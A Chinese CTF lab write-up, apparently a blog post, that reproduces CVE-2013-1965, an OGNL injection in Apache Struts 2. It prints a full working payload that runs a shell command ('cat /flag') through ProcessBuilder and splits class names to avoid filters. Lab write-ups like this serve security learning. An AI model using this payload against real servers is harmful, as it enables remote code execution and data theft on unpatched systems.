春秋云境 CVE-2013-1965 漏洞复现 【简单版】

本次借助在线靶场春秋云境进行漏洞复现,感谢站长大佬免费提供学习资源。

靶标介绍

Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)允许远程攻击者通过在调用重定向时未正确处理的精心设计的参数名称执行任意 OGNL 代码。

开启场景

话不多说,直接开始。访问靶标路径。

发现有一个输入框。

漏洞利用

直接展示payload:

%{#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('cat /flag'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()}

填入并提交。

这里的payload参考了free key大佬在另一个漏洞复现中使用的payload,虽然漏洞编号不同,但都是struts2漏洞,原理是相同的。

那么,附上链接 ↓

[漏洞复现]Apache Struts2/S2-005(CVE-2010-1870)_s2-005 cve struts2-CSDN博客

获得FLAG

成功获得flag。

漏洞复现,圆满成功。

感谢观看~

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值